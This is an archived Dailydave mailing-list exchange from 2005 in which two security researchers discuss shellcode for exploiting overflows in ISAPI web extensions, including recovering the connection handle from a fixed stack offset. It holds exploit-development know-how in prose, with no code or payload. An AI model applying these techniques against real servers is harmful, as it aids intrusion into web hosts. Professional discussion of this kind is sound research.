halvar_at_gmx.de wrote:
>
> Readclient shellcode is the obvious way to go when doing ISAPI. The
> retrieval
> of the connection ID is in most cases not a problem -- very few
> ISAPI's I've seen
> overflow in a different thread than the one that went through
> HttpExtensionProc.
> In that case, unless you're very unlucky, your ESP is still intact,
> and unless you
> _really_ smashed the stack (e.g. memcpy(,,-1)) you will have no
> problem retrieving
> the lpECB from [ESP+static_offset]. Remember that stack frame sizes
> are constant
> for a given executable, and that you can just rely on a value you
> figured out in your
> own debugger here. Of yourse, you have to adjust 1 offset in the
> shellcode to make
> it work for different targets.
>
(The following note is stuff Halvar and a lot of people already know or
find too obvious to mention, but not everyone does)
This is true in some cases, but not in others (heap overflows, even some
stack overflows). A good ISAPIcode will handle those cases. It's nice to
avoid that extra step, in any case. :>
-dave
_______________________________________________
Dailydave mailing list
Dailydave_at_lists.immunitysec.com
https://lists.immunitysec.com/mailman/listinfo/dailydave
Received on Jan 07 2005
Intro
